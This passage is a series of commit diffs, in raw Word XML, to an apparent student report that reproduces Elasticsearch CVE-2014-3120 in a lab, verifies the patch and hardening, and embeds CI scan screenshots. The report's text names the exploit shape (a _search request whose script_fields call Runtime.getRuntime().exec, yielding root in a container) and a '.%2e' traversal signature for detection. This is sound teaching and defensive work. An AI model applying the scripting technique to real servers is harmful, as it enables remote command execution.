-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Vulnerability vs exploit.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A vulnerability is the flaw itself</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>(Elasticsearch compiles and evaluates client-supplied scripts with full Java</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>reflection and no authentication). An exploit is the concrete request that</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>abuses it (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>POST /_search</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>script_fields</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> calling</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Runtime.getRuntime().exec</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>). In this work the vulnerability is the dangerous</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>default in the product; the exploit is the curl request.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Why regression testing after a patch.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A patch changes behaviour, and a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>security fix that disables the feature is not a fix. Here, a perfectly</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>"secure" answer would be to block the whole service; the regression check</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>GET /</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> still returns 200) proves the legitimate path still works.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Why reproduce CVEs as a specialist.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A pentester needs to know what a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>working exploit looks like in order to judge whether a target is really</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>affected, and a SOC analyst needs the same knowledge to recognise the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>traffic in logs. Reproduction turns a CVE description into a concrete</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">signature: the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.%2e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pattern in a URL is trivial to grep for once you have</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>seen it.</w:t>
+        <w:t xml:space="preserve"> is trivial to spot in a proxy log once you have seen it.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -6426,6 +5541,9 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
     <w:rsid w:val="00FC693F"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto" w:after="120"/>
+    </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun"/>
       <w:sz w:val="22"/>

</xml_diff>

<commit_message>
docs: embed the eight evidence screenshots in the report
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -1447,13 +1447,58 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="3380878"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="01-api-smoke-test.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="3380878"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: terminal running scripts/live_demo.ps1 – steps 1, 3, 4 visible</w:t>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 1 - API smoke test: 401 without a token, 401 on a wrong password, 200 with a valid JWT</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2738,33 +2783,168 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: GitHub Actions – all three jobs green</w:t>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="3850000"/>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="02-actions-overview.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="3850000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: sast job log – "No issues identified"</w:t>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 2 - GitHub Actions: run #6 finished successfully, all three jobs green</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="2179145"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="03-sast-bandit.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="2179145"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: sca job log – "No known vulnerabilities found"</w:t>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 3 - SAST: bandit reports no issues (503 lines scanned)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="817179"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="04-sca-pip-audit.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="817179"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 4 - SCA: pip-audit reports no known vulnerabilities</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3453,13 +3633,58 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="3380878"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="05-cve-vulnerable.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="3380878"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: terminal – curl _search returning UNIXProcess + `uid=0(root)` inside the container</w:t>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 5 - CVE-2014-3120 reproduced on 1.1.1: the script runs, id is root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3702,13 +3927,58 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="3380878"/>
+            <wp:docPr id="6" name="Picture 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="06-default-config.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="3380878"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: elasticsearch.yml showing script.disable_dynamic absent / default</w:t>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 6 - the default 1.1.1 config has no script.disable_dynamic, so scripting is on</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4652,23 +4922,113 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: fixed environment – attack returns 400, no file created, search still returns 1 hit</w:t>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="3380878"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="07-fixed.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="3380878"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:i/>
-          <w:color w:val="808080"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Screenshot: hardened 1.1.1 – same 400 rejection, site still functional</w:t>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 7 - 1.4.4 rejects the script (dynamic scripting for [groovy] disabled)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5544000" cy="3380878"/>
+            <wp:docPr id="8" name="Picture 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="08-hardened.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5544000" cy="3380878"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="17"/>
+        </w:rPr>
+        <w:t>Figure 8 - hardened 1.1.1 rejects the script, the search still works</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
docs: use the real GitHub Actions screenshots for the CI evidence
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -2751,7 +2751,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Local run of the same three commands:</w:t>
+        <w:t>Result of run #8 (the same commands, executed by the pipeline; the bandit step prints its report to the log so the result is visible without downloading the artifact):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2790,7 +2790,7 @@
       <w:r>
         <w:drawing>
           <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5544000" cy="3850000"/>
+            <wp:extent cx="5544000" cy="3245324"/>
             <wp:docPr id="2" name="Picture 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks noChangeAspect="1"/>
@@ -2811,7 +2811,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5544000" cy="3850000"/>
+                      <a:ext cx="5544000" cy="3245324"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect"/>
                   </pic:spPr>
@@ -2834,7 +2834,7 @@
           <w:color w:val="555555"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>Figure 2 - GitHub Actions: run #6 finished successfully, all three jobs green</w:t>
+        <w:t>Figure 2 - GitHub Actions run #8: success, all three jobs green (Tests 17s, SAST 11s, SCA 25s)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2845,7 +2845,7 @@
       <w:r>
         <w:drawing>
           <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5544000" cy="2179145"/>
+            <wp:extent cx="5544000" cy="3561706"/>
             <wp:docPr id="3" name="Picture 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks noChangeAspect="1"/>
@@ -2866,7 +2866,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5544000" cy="2179145"/>
+                      <a:ext cx="5544000" cy="3561706"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect"/>
                   </pic:spPr>
@@ -2889,7 +2889,7 @@
           <w:color w:val="555555"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>Figure 3 - SAST: bandit reports no issues (503 lines scanned)</w:t>
+        <w:t>Figure 3 - GitHub Actions SAST job log: bandit reports no issues, 503 lines scanned</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2900,7 +2900,7 @@
       <w:r>
         <w:drawing>
           <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-            <wp:extent cx="5544000" cy="817179"/>
+            <wp:extent cx="5544000" cy="3251942"/>
             <wp:docPr id="4" name="Picture 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks noChangeAspect="1"/>
@@ -2921,7 +2921,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5544000" cy="817179"/>
+                      <a:ext cx="5544000" cy="3251942"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect"/>
                   </pic:spPr>
@@ -2944,7 +2944,7 @@
           <w:color w:val="555555"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>Figure 4 - SCA: pip-audit reports no known vulnerabilities</w:t>
+        <w:t>Figure 4 - GitHub Actions SCA job log: pip-audit reports no known vulnerabilities</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
docs: fill the title page (variant, student, id, date)
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
